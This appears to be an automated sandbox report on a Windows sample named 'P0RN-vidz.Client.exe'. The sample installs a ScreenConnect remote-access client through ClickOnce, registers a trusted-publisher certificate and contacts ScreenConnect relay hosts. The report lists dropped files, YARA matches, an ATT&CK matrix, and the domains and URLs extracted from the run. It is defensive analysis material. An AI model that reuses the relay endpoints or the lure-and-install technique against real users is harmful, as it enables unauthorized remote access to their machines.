                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exe Code function: 0_2_00371807 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00371807
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: Yara match File source: 10.0.ScreenConnect.WindowsClient.exe.c50000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara match File source: 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000001.00000002.3003585301.0000020C26DA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000A.00000002.2530078274.000000001B8E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000A.00000002.2527787169.000000000303D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: dfsvc.exe PID: 3060, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7724, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 7776, type: MEMORYSTR
                  Source: Yara match File source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exe, type: DROPPED
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 DLL Search Order Hijacking | 1 DLL Search Order Hijacking | 1 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 2 Windows Service | 2 Windows Service | 1 Install Root Certificate | Security Account Manager | 24 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 12 Process Injection | 1 Timestomp | NTDS | 51 Security Software Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Bootkit | 1 Scheduled Task/Job | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Search Order Hijacking | Cached Domain Credentials | 51 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 51 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                  Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Hidden Users | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                  Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Bootkit | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
                  [Behavior graph: ID 1579051, Sample: P0RN-vidz.Client.exe, Start date: 20/12/2024, Architecture: WINDOWS, Score: 48]

                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.ClientService.exe | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..core_4b14c015c87c1ad8_0018.0004_none_53e91df7fcfd4a60\ScreenConnect.Core.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..dows_4b14c015c87c1ad8_0018.0004_none_5860f5d9394b5d90\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9fe7bca0c4ca064\ScreenConnect.Client.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..vice_4b14c015c87c1ad8_0018.0004_none_053cb64092bcadcb\ScreenConnect.ClientService.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Client.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.exe | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Core.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  server-nixd2d85b70-relay.screenconnect.com | 147.75.81.4 | true | false | | unknown
                  server-nixd2d85b70-web.screenconnect.com | 147.75.81.6 | true | false | | unknown
                  fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
                  koidesfac.screenconnect.com | unknown | unknown | false | | unknown
                  instance-l7g4dh-relay.screenconnect.com | unknown | unknown | false | | unknown
                                                                                                                          high
                                                                                                                          https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationXScreenConnect.WindowsClient.exe, 0000000A.00000002.2527787169.0000000002FC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientZuScreenConnect.WindowsClient.exe, 0000000A.00000002.2529761334.000000001B88B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://koidesfac.screenconnect.com-ScreenConnect.WindowsClient.exe, 0000000A.00000002.2530333288.000000001B950000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=806004psvchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAsvchost.exe, 00000007.00000003.2237670518.000001CCF8129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000007.00000002.3278760569.000001CCF78DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://w=3.org/2001/Xdfsvc.exe, 00000001.00000002.3015186666.0000020C3F1A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://Passport.NET/tb_comsvchost.exe, 00000007.00000002.3280023358.000001CCF8635000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationDdfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-2008svchost.exe, 00000007.00000002.3279734727.000001CCF8178000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.exekdfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsClient.exe.configqdfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application8dfsvc.exe, 00000001.00000002.3017968279.0000020C40CB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsuersvchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=instancNL9Z8XK8.log.1.drfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://instance-l7g4dh-relay.screenconnect.com:443/ScreenConnect.ClientService.exe, 0000000C.00000002.3278324089.0000000001490000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAsvchost.exe, 00000007.00000003.2237670518.000001CCF8129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 00000007.00000002.3279734727.000001CCF815F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://koidesfac.screenconnect.comdfsvc.exe, 00000001.00000002.3003585301.0000020C27211000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26D31000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3279734727.000001CCF815F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://koidesfac.screenconnect.com/Bin/ScreenConnect.Cliedfsvc.exe, 00000001.00000002.3003585301.0000020C2717F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/scgsvchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://koidesfac.screencodfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27167000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://Passport.NET/STSsvchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.manifest:dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstagedfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsClient.exxdfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000001.00000002.3003585301.0000020C26B70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.edfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config3dfsvc.exe, 00000001.00000002.3018292902.0000020C40D03000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://instance-l7g4dh-relay.screenconnect.com:443/dScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000022B8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000020E4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.000000000228F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000023C4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000023FE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000021EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.0000000002476000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000020B5000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.000000000216D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://www.w3.odfsvc.exe, 00000001.00000002.3003585301.0000020C26F11000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26F3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://Passport.NET/tbsvchost.exe, 00000007.00000002.3280179068.000001CCF865A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2289529280.000001CCF8184000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3280023358.000001CCF8635000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2061645464.000001CCF8153000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2289512166.000001CCF812F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2289512166.000001CCF8132000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManagpdfsvc.exe, 00000001.00000002.3003585301.0000020C2717F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000007.00000003.2289477636.000001CCF815C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278760569.000001CCF78DD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2206424644.000001CCF810E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2237670518.000001CCF8129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000007.00000002.3279734727.000001CCF815F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationyScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.0000000001353000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://signup.live.com/signup.aspxsvchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF812C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8155000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationxdfsvc.exe, 00000001.00000002.3003585301.0000020C26DA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationdfsvc.exe, 00000001.00000002.3018898554.0000020C40E01000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3017968279.0000020C40CB9000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527787169.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2529863446.000000001B8C5000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527787169.000000000303D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527787169.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.0000000001353000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.0000000001381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmpfalse
IP | Domain | Country | ASN | ASN Name | Malicious
147.75.81.4 | server-nixd2d85b70-relay.screenconnect.com | Switzerland | 54825 | PACKETUS | false
